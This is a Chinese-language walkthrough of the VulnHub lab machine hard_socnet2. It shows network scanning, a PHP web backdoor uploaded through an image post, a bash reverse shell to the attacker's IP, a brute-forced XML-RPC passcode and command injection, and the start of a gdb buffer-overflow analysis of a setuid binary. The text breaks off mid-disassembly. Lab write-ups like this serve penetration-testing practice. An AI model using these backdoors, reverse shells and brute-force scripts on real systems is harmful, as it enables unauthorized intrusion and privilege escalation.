靶机: hard_socnet2
靶机: hard_socnet2
准备
靶机:https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova
MD5 验证: 9d6bed141a97452fcb8ca2921207c24e
- cmd 进行校验:
certutil -hashfile 文件路径 MD5 - powershell 进行校验:
Get-FileHash 文件路径 -Algorithm MD5 | Format-List
- cmd 进行校验:
使用 VirtualBox
网络 Host-Only
配置网络环境:https://www.cnblogs.com/shadow-/p/16815020.html
- kali: NAT + [ Bridged/Host-Only ]
攻略
发现目标
使用 arp-scan 结合 nmap 进行
使用
sudo arp-scan -l -I eth1发现目标 IP : 192.168.56.114┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:d3:0c:de PCS Systemtechnik GmbH
192.168.56.114 08:00:27:c4:b2:37 PCS Systemtechnik GmbH
- 192.168.56.1 是网关
- 192.168.56.100 是 DHCP 服务器
使用
nmap -A -T4 192.168.56.114简单扫描一番,发现三个开发端口┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.114
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-06 13:15 CST
Nmap scan report for 192.168.56.114
Host is up (0.0014s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5d34e54fe663ef3b2a54b519f5ff9c6 (RSA)
| 256 de86ef769363748300b1a3b8c24c8f58 (ECDSA)
|_ 256 b5ecf11e9a5a5cd7023a9e1bf7c8b453 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Social Network
8000/tcp open http BaseHTTPServer 0.3 (Python 2.7.15rc1)
|_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1
|_xmlrpc-methods: XMLRPC instance doesn't support introspection.
|_http-title: Error response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds
22/tcp是 SSH 服务,应用版本是 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)80/tcp是 http 服务,使用 Apache/2.4.29 (Ubuntu)8000/tcp是 http 服务,使用 BaseHTTPServer 0.3 (Python 2.7.15rc1)- BaseHTTPServer 是 HTTP 服务器这个模块定义了两个实现 HTTP 服务器的类
- 根据扫描结果这个端口并不能很好访问
初步攻击
根据扫描结果,80/tcp 更容易成为突破口,使用 firefox 访问 http://192.168.56.114:80/ 是一个登录界面
<!DOCTYPE html>
<html>
<head>
<title>Social Network</title>
<link rel="stylesheet" type="text/css" href="resources/css/main.css">
<style>
.container{
margin: 40px auto;
width: 400px;
}
.content {
padding: 30px;
background-color: white;
box-shadow: 0 0 5px #4267b2;
}
</style>
</head>
<body>
<h1>Welcome to Pynch</h1>
<div class="container">
<div class="tab">
<button class="tablink active" onclick="openTab(event,'signin')" id="link1">Login</button>
<button class="tablink" onclick="openTab(event,'signup')" id="link2">Sign Up</button>
</div>
<div class="content">
<div class="tabcontent" id="signin">
<form method="post" onsubmit="return validateLogin()">
<label>Email<span>*</span></label><br>
<input type="text" name="useremail" id="loginuseremail">
<div class="required"></div>
<br>
<label>Password<span>*</span></label><br>
<input type="password" name="userpass" id="loginuserpass">
<div class="required"></div>
<br><br>
<input type="submit" value="Login" name="login">
</form>
</div>
<div class="tabcontent" id="signup">
<form method="post" onsubmit="return validateRegister()">
<!--Package One-->
<h2>Highly Required Information</h2>
<hr>
<!--First Name-->
<label>First Name<span>*</span></label><br>
<input type="text" name="userfirstname" id="userfirstname">
<div class="required"></div>
<br>
<!--Last Name-->
<label>Last Name<span>*</span></label><br>
<input type="text" name="userlastname" id="userlastname">
<div class="required"></div>
<br>
<!--Nickname-->
<label>Nickname</label><br>
<input type="text" name="usernickname" id="usernickname">
<div class="required"></div>
<br>
<!--Password-->
<label>Password<span>*</span></label><br>
<input type="password" name="userpass" id="userpass">
<div class="required"></div>
<br>
<!--Confirm Password-->
<label>Confirm Password<span>*</span></label><br>
<input type="password" name="userpassconfirm" id="userpassconfirm">
<div class="required"></div>
<br>
<!--Email-->
<label>Email<span>*</span></label><br>
<input type="text" name="useremail" id="useremail">
<div class="required"></div>
<br>
<!--Birth Date-->
Birth Date<span>*</span><br>
<select name="selectday">
<option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option> </select>
<select name="selectmonth">
<option value="1">January</option><option value="2">February</option><option value="3">March</option><option value="4">April</option><option value="5">May</option><option value="6">June</option><option value="7">July</option><option value="8">August</option><option value="9">September</option><option value="10">October</option><option value="11">Novemeber</option><option value="12">December</option> </select>
<select name="selectyear">
<option value="2017">2017</option><option value="2016">2016</option><option value="2015">2015</option><option value="2014">2014</option><option value="2013">2013</option><option value="2012">2012</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option><option value="2003">2003</option><option value="2002">2002</option><option value="2001">2001</option><option value="2000">2000</option><option value="1999">1999</option><option value="1998">1998</option><option value="1997">1997</option><option value="1996" selected>1996</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911">1911</option><option value="1910">1910</option><option value="1909">1909</option><option value="1908">1908</option><option value="1907">1907</option><option value="1906">1906</option><option value="1905">1905</option><option value="1904">1904</option><option value="1903">1903</option><option value="1902">1902</option><option value="1901">1901</option><option value="1900">1900</option> </select>
<br><br>
<!--Gender-->
<input type="radio" name="usergender" value="M" id="malegender" class="usergender">
<label>Male</label>
<input type="radio" name="usergender" value="F" id="femalegender" class="usergender">
<label>Female</label>
<div class="required"></div>
<br>
<!--Hometown-->
<label>Hometown</label><br>
<input type="text" name="userhometown" id="userhometown">
<br>
<!--Package Two-->
<h2>Additional Information</h2>
<hr>
<!--Marital Status-->
<input type="radio" name="userstatus" value="S" id="singlestatus">
<label>Single</label>
<input type="radio" name="userstatus" value="E" id="engagedstatus">
<label>Engaged</label>
<input type="radio" name="userstatus" value="M" id="marriedstatus">
<label>Married</label>
<br><br>
<!--About Me-->
<label>About Me</label><br>
<textarea rows="12" name="userabout" id="userabout"></textarea>
<br><br>
<input type="submit" value="Create Account" name="register">
</form>
</div>
</div>
</div>
<script src="resources/js/main.js"></script>
</body>
</html>
分析表单,分析登录并没有什么特别好的方法,我们可以尝试注册一个账号登录
登录后的界面,在聊天区有 admin 账号的信息
Hello friends! I have been working on a new script for monitoring servers. It is called monitor.py. I am running it on this server. I will release it soon!
我们可以在聊天群上传图片,我们使用 webacoo 进行入侵
- 制作木马:
webacoo -g -o exp.php - 在聊天处上传文件
exp.php发一条留言,并复制上传图片位置 - 执行
webacoo -t -u http://192.168.56.114/data/images/posts/11.php
┌──(kali㉿kali)-[~/workspace]
└─$ webacoo -t -u http://192.168.56.114/data/images/posts/11.php
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
Copyright (C) 2011-2012 Anestis Bechtsoudis
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }
[+] Connecting to remote server as...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Type 'load' to use an extension module.
[*] Type ':<cmd>' to run local OS commands.
[*] Type 'exit' to quit terminal.
webacoo$ ls
10.php
11.php
4.png
5.png
6.png
查看版本内核
webacoo$ uname -a
Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
此处可以使用 CVE-2021-3493 漏洞直接进行攻破,但我们不使用
更好的维持 shell
我们分享当前的 shell 能力有限,我们需要封装一个木马
#!/bin/bash
bash -i >& /dev/tcp/192.168.56.111/4444 0>&1
- 上传此木马,通过聊天区或 python3 挂服务上传,使用 webacoo 的 shell 赋予上传的新木马可以执行权限
- Kali 挂监听 4444 然后 webacoo 的 shell 执行上传脚本
再次提升
- 在新的 shell 中执行
python -c "import pty; pty.spawn('/bin/bash')"再次提升交互性
提权 www-data
信息收集
查看
cat /etc/passwdwww-data@socnet2:/var/www/html/data/images/posts$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
socnet:x:1000:1000:socnet2:/home/socnet:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
- 发现用户 socnet
我们去验证
/home/socnet并探查www-data@socnet2:/var/www/html/data/images/posts$ cd /home/socnet
cd /home/socnet
www-data@socnet2:/home/socnet$ ls -alh
ls -alh
total 60K
drwxr-xr-x 6 socnet socnet 4.0K Oct 29 2018 .
drwxr-xr-x 3 root root 4.0K Oct 29 2018 ..
-rw-r--r-- 1 socnet socnet 3.7K Apr 4 2018 .bashrc
drwx------ 2 socnet socnet 4.0K Oct 29 2018 .cache
-rw------- 1 socnet socnet 1.1K Oct 29 2018 .gdb_history
-rw-rw-r-- 1 socnet socnet 22 Oct 29 2018 .gdbinit
drwx------ 3 socnet socnet 4.0K Oct 29 2018 .gnupg
drwxrwxr-x 3 socnet socnet 4.0K Oct 29 2018 .local
-rw------- 1 socnet socnet 579 Oct 29 2018 .mysql_history
-rw-r--r-- 1 socnet socnet 807 Apr 4 2018 .profile
-rw-rw-r-- 1 socnet socnet 66 Oct 29 2018 .selected_editor
-rw-r--r-- 1 socnet socnet 0 Oct 29 2018 .sudo_as_admin_successful
-rwsrwsr-x 1 root socnet 6.8K Oct 29 2018 add_record
-rw-rw-r-- 1 socnet socnet 904 Oct 29 2018 monitor.py
drwxrwxr-x 4 socnet socnet 4.0K Oct 29 2018 peda
- 注意 add_record 文件它权限中的
s的目前我权限动不了 - 注意 monitor.py 是前文聊天区中 admin 的所说的内容
- peda 是动态调试用的,我们大概可以猜测是需要反汇编
- 注意 add_record 文件它权限中的
查看 monitor.py
#my remote server management API
import SimpleXMLRPCServer
import subprocess
import random debugging_pass = random.randint(1000,9999) def runcmd(cmd):
results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = results.stdout.read() + results.stderr.read()
return output def cpu():
return runcmd("cat /proc/cpuinfo") def mem():
return runcmd("free -m") def disk():
return runcmd("df -h") def net():
return runcmd("ip a") def secure_cmd(cmd,passcode):
if passcode==debugging_pass:
return runcmd(cmd)
else:
return "Wrong passcode." server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))
server.register_function(cpu)
server.register_function(mem)
server.register_function(disk)
server.register_function(net)
server.register_function(secure_cmd) server.serve_forever()
得知它是 admin 的 remote server management API (远程管理 API)
SimpleXMLRPCServer 调用的端口
8000开始的扫描端口记着吗?SimpleXMLRPCServer 资料
尝试通过 monitor.py 攻击
编写访问测试的脚本
import xmlrpc.client with xmlrpc.client.ServerProxy("http://192.168.56.114:8000/") as proxy:
print(str(proxy.cpu()))
- 测试成功
┌──(kali㉿kali)-[~]
└─$ python3 client.py
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 122
model name : Intel(R) Celeron(R) J4125 CPU @ 2.00GHz
stepping : 8
cpu MHz : 1996.797
cache size : 4096 KB
physical id : 0
siblings : 1
core id : 0
cpu cores : 1
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 22
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave rdrand hypervisor lahf_lm 3dnowprefetch fsgsbase rdseed clflushopt arch_capabilities
bugs : spectre_v1 spectre_v2 spec_store_bypass
bogomips : 3993.59
clflush size : 64
cache_alignment : 64
address sizes : 39 bits physical, 48 bits virtual
power management:
调整
import xmlrpc.client with xmlrpc.client.ServerProxy("http://192.168.56.114:8000/") as proxy:
for i in range(1000, 10000):
if not "Wrong" in str(proxy.secure_cmd('whoami', i)):
print(i)
break
结果
┌──(kali㉿kali)-[~]
└─$ python3 client.py
4712
使用之前更好的维持 shell 的反弹 shell 木马完成新的反弹 shell
import xmlrpc.client
with xmlrpc.client.ServerProxy("http://192.168.56.114:8000/") as proxy:
str(proxy.secure_cmd('/var/www/html/data/images/posts/exp.sh', 4712))
结果提权为 socnet 用户
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.114] 41584
bash: cannot set terminal process group (730): Inappropriate ioctl for device
bash: no job control in this shell
socnet@socnet2:~$
执行
python -c "import pty; pty.spawn('/bin/bash')"再次提升交互性
二次提权
现在我们已经提权为 socnet 用户,我们有权限动 add_record
socnet@socnet2:~$ ls -hl
ls -hl
total 16K
-rwsrwsr-x 1 root socnet 6.8K Oct 29 2018 add_record
-rw-rw-r-- 1 socnet socnet 904 Oct 29 2018 monitor.py
drwxrwxr-x 4 socnet socnet 4.0K Oct 29 2018 peda
socnet@socnet2:~$ file add_record
file add_record
add_record: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e3fa9a66b0b1e3281ae09b3fb1b7b82ff17972d8, not stripped
- 通过执行 add_record 可以发现是一个添加职员信息的一个程序
- 程序是
ELF 32-bit动态链接/lib/ld-linux.so.2
在此我们使用 gdb 进行调试 add_record 命令 gdb -q ./add_record
```bash
socnet@socnet2:~$ gdb -q ./add_record
gdb -q ./add_record
Reading symbols from ./add_record...(no debugging symbols found)...done.
gdb-peda$
```
使用
r运行,通过过多的输入查看是否存在内存溢出漏洞gdb-peda$ r
r
Starting program: /home/socnet/add_record
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
Employee Name(char): aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Years worked(int): Salary(int): Ever got in trouble? 1 (yes) or 0 (no): Employee data you've entered:
Name aaaaaaaaaaaaaaaaaaaaaaaa
Years -136196023, Salary -8468, Trouble 8, Comments NA
[Inferior 1 (process 17038) exited normally]
Warning: not running or target is remote
- Inferior 1 (process 17038) exited normally 说明没有内存溢出漏洞,反复试探剩下的注入点
内存溢出漏洞在注入点
Explain:处gdb-peda$ r
r
Starting program: /home/socnet/add_record
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
Employee Name(char): aa
aa
Years worked(int): 11
11
Salary(int): 1
1
Ever got in trouble? 1 (yes) or 0 (no): 1
1
Explain: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffdc1e ('a' <repeats 102 times>)
EBX: 0x61616161 ('aaaa')
ECX: 0xffffdce0 --> 0x6161 ('aa')
EDX: 0xffffdc82 --> 0x61006161 ('aa')
ESI: 0xf7fc2000 --> 0x1d4d6c
EDI: 0xffffdce0 --> 0x6161 ('aa')
EBP: 0x61616161 ('aaaa')
ESP: 0xffffdc60 ('a' <repeats 36 times>)
EIP: 0x61616161 ('aaaa')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x61616161
[------------------------------------stack-------------------------------------]
0000| 0xffffdc60 ('a' <repeats 36 times>)
0004| 0xffffdc64 ('a' <repeats 32 times>)
0008| 0xffffdc68 ('a' <repeats 28 times>)
0012| 0xffffdc6c ('a' <repeats 24 times>)
0016| 0xffffdc70 ('a' <repeats 20 times>)
0020| 0xffffdc74 ('a' <repeats 16 times>)
0024| 0xffffdc78 ('a' <repeats 12 times>)
0028| 0xffffdc7c ("aaaaaaaa")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x61616161 in ?? ()
- 重点关注
EIP寄存器状态
- 重点关注
使用
pattern create 100生成一个寄存器容量上限数据不重复的字符串,测试关键节点gdb-peda$ pattern create 100
pattern create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
r
Starting program: /home/socnet/add_record
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
Employee Name(char): aa
aa
Years worked(int): 111
111
Salary(int): 1
1
Ever got in trouble? 1 (yes) or 0 (no): 1
1
Explain: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffdc1e ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
EBX: 0x63414147 ('GAAc')
ECX: 0xffffdce0 --> 0x0
EDX: 0xffffdc82 --> 0x42414100 ('')
ESI: 0xf7fc2000 --> 0x1d4d6c
EDI: 0xffffdce0 --> 0x0
EBP: 0x41324141 ('AA2A')
ESP: 0xffffdc60 ("dAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
EIP: 0x41414841 ('AHAA')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414841
[------------------------------------stack-------------------------------------]
0000| 0xffffdc60 ("dAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0004| 0xffffdc64 ("AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0xffffdc68 ("AeAA4AAJAAfAA5AAKAAgAA6AAL")
0012| 0xffffdc6c ("4AAJAAfAA5AAKAAgAA6AAL")
0016| 0xffffdc70 ("AAfAA5AAKAAgAA6AAL")
0020| 0xffffdc74 ("A5AAKAAgAA6AAL")
0024| 0xffffdc78 ("KAAgAA6AAL")
0028| 0xffffdc7c ("AA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414841 in ?? ()
- 在字符串中
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL查找 EIP 寄存器的AHAA - 使用 grep 确认位置
echo 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' | grep 'AHAA' - 关键长度
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAA通过最后四个字符串控制 EIP 寄存器
- 在字符串中
现在我们要确定需要注入的内容
使用
disas main查看汇编代码0x080486d8 <+0>: lea ecx,[esp+0x4]
0x080486dc <+4>: and esp,0xfffffff0
0x080486df <+7>: push DWORD PTR [ecx-0x4]
0x080486e2 <+10>: push ebp
0x080486e3 <+11>: mov ebp,esp
0x080486e5 <+13>: push edi
0x080486e6 <+14>: push esi
0x080486e7 <+15>: push ebx
0x080486e8 <+16>: push ecx
0x080486e9 <+17>: sub esp,0xa8
0x080486ef <+23>: call 0x80485b0 <__x86.get_pc_thunk.bx>
0x080486f4 <+28>: add ebx,0x1654
0x080486fa <+34>: mov DWORD PTR [ebp-0xac],0x414e
0x08048704 <+44>: lea edx,[ebp-0xa8]
0x0804870a <+50>: mov eax,0x0
0x0804870f <+55>: mov ecx,0x18
0x08048714 <+60>: mov edi,edx
0x08048716 <+62>: rep stos DWORD PTR es:[edi],eax
0x08048718 <+64>: sub esp,0x8
0x0804871b <+67>: lea eax,[ebx-0x13ee]
0x08048721 <+73>: push eax
0x08048722 <+74>: lea eax,[ebx-0x13ec]
0x08048728 <+80>: push eax
0x08048729 <+81>: call 0x8048520 <fopen@plt>
0x0804872e <+86>: add esp,0x10
0x08048731 <+89>: mov DWORD PTR [ebp-0x1c],eax
0x08048734 <+92>: sub esp,0xc
0x08048737 <+95>: lea eax,[ebx-0x13d4]
0x0804873d <+101>: push eax
0x0804873e <+102>: call 0x80484e0 <puts@plt>
0x08048743 <+107>: add esp,0x10
0x08048746 <+110>: sub esp,0xc
0x08048749 <+113>: lea eax,[ebx-0x137c]
0x0804874f <+119>: push eax
0x08048750 <+120>: call 0x8048480 <printf@plt>
0x08048755 <+125>: add esp,0x10
0x08048758 <+128>: mov eax,DWORD PTR [ebx-0x4]
0x0804875e <+134>: mov eax,DWORD PTR [eax]
0x08048760 <+136>: sub esp,0x4
0x08048763 <+139>: push eax
0x08048764 <+140>: push 0x19
0x08048766 <+142>: lea eax,[ebp-0x39]
0x08048769 <+145>: push eax
0x0804876a <+146>: call 0x80484b0 <fgets@plt>
0x0804876f <+151>: add esp,0x10
0x08048772 <+154>: sub esp,0xc
0x08048775 <+157>: lea eax,[ebx-0x1366]
0x0804877b <+163>: push eax
0x0804877c <+164>: call 0x8048480 <printf@plt>
0x08048781 <+169>: add esp,0x10
0x08048784 <+172>: sub esp,0x8
0x08048787 <+175>: lea eax,[ebp-0x40]
0x0804878a <+178>: push eax
0x0804878b <+179>: lea eax,[ebx-0x1352]
0x08048791 <+185>: push eax
0x08048792 <+186>: call 0x8048540 <__isoc99_scanf@plt>
0x08048797 <+191>: add esp,0x10
0x0804879a <+194>: sub esp,0xc
0x0804879d <+197>: lea eax,[ebx-0x134f]
0x080487a3 <+203>: push eax
0x080487a4 <+204>: call 0x8048480 <printf@plt>
0x080487a9 <+209>: add esp,0x10
0x080487ac <+212>: sub esp,0x8
0x080487af <+215>: lea eax,[ebp-0x44]
0x080487b2 <+218>: push eax
0x080487b3 <+219>: lea eax,[ebx-0x1352]
0x080487b9 <+225>: push eax
0x080487ba <+226>: call 0x8048540 <__isoc99_scanf@plt>
0x080487bf <+231>: add esp,0x10
0x080487c2 <+234>: sub esp,0xc
0x080487c5 <+237>: lea eax,[ebx-0x1340]
0x080487cb <+243>: push eax
0x080487cc <+244>: call 0x8048480 <printf@plt>
0x080487d1 <+249>: add esp,0x10
0x080487d4 <+252>: sub esp,0x8
0x080487d7 <+255>: lea eax,[ebp-0x48]
0x080487da <+258>: push eax
0x080487db <+259>: lea eax,[ebx-0x1352]
0x080487e1 <+265>: push eax
0x080487e2 <+266>: call 0x8048540 <__isoc99_scanf@plt>
0x080487e7 <+271>: add esp,0x10
0x080487ea <+274>: call 0x80484a0 <getchar@plt>
0x080487ef <+279>: mov DWORD PTR [ebp-0x20],eax
0x080487f2 <+282>: cmp DWORD PTR [ebp-0x20],0xa
0x080487f6 <+286>: je 0x80487fe <main+294>
0x080487f8 <+288>: cmp DWORD PTR [ebp-0x20],0xffffffff
0x080487fc <+292>: jne 0x80487ea <main+274>
0x080487fe <+294>: mov eax,DWORD PTR [ebp-0x48]
0x08048801 <+297>: cmp eax,0x1
0x08048804 <+300>: jne 0x804883c <main+356>
0x08048806 <+302>: sub esp,0xc
0x08048809 <+305>: lea eax,[ebx-0x1317]
0x0804880f <+311>: push eax
0x08048810 <+312>: call 0x8048480 <printf@plt>
0x08048815 <+317>: add esp,0x10
0x08048818 <+320>: sub esp,0xc
0x0804881b <+323>: lea eax,[ebp-0xac]
0x08048821 <+329>: push eax
0x08048822 <+330>: call 0x8048490 <gets@plt>
0x08048827 <+335>: add esp,0x10
0x0804882a <+338>: sub esp,0xc
0x0804882d <+341>: lea eax,[ebp-0xac]
0x08048833 <+347>: push eax
0x08048834 <+348>: call 0x80486ad <vuln>
0x08048839 <+353>: add esp,0x10
0x0804883c <+356>: sub esp,0xc
0x0804883f <+359>: lea eax,[ebx-0x130d]
0x08048845 <+365>: push eax
0x08048846 <+366>: call 0x80484e0 <puts@plt>
0x0804884b <+371>: add esp,0x10
0x0804884e <+374>: mov ecx,DWORD PTR [ebp-0x48]
0x08048851 <+377>: mov edx,DWORD PTR [ebp-0x44]
0x08048854 <+380>: mov eax,DWORD PTR [ebp-0x40]
0x08048857 <+383>: sub esp,0x8
0x0804885a <+386>: lea esi,[ebp-0xac]
0x08048860 <+392>: push esi
0x08048861 <+393>: push ecx
0x08048862 <+394>: push edx
0x08048863 <+395>: push eax
0x08048864 <+396>: lea eax,[ebp-0x39]
0x08048867 <+399>: push eax
0x08048868 <+400>: lea eax,[ebx-0x12ec]
0x0804886e <+406>: push eax
